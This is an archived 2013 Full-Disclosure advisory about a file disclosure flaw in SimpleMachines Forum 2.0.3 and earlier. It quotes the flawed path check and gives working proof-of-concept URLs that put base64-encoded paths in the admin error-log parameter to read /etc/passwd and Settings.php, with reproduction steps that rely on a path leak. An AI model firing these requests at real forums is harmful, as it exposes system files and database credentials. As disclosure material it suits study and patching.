lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 7 Jan 2013 11:54:51 -0300
From: WHK Yan <yan.uniko.102@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: submissions@...ketstormsecurity.com, mr.inj3ct0r@...il.com,
	submit@...ecurity.com, vuln@...unia.com, vuldb@...urityfocus.com
Subject: File Disclosure in SimpleMachines Forum <= 2.0.3

*Summary:*
--------------
A security flaw allows an attacker to know the full source file of the web
system.

*Details:
-----------
Sources/ManageErrors.php Line 340:
// Make sure the file we are looking for is one they are allowed to look at
if (!is_readable($file) || (strpos($file, '../') !== false && (
strpos($file, $boarddir) === false || strpos($file, $sourcedir) === false)))
    fatal_lang_error('error_bad_file', true,
array(htmlspecialchars($file)));

Bypass function strpos($file, '../'), no need "../", example:
/home/foo/www/Settings.php

*PoC:
-------
http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q=
Read /etc/passwd

works with path disclosure for read Settings.php:
http://whk.drawcoders.net/index.php/topic,2792.0.html

*Reproduce:
1. Open http://example.com/forumpath/SSI.php?ssi_function=fetchPosts
2. Get full path of web app ( /home/1337/public_html/SSI.php ).
3. Exploit in base64:
http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2hvbWUvc3BhZG1pbi9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHA=
To read /home/spadmin/public_html/Settings.php

Referer and Mirror:
-------------------------
http://whk.drawcoders.net/index.php/topic,2805.0.html

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ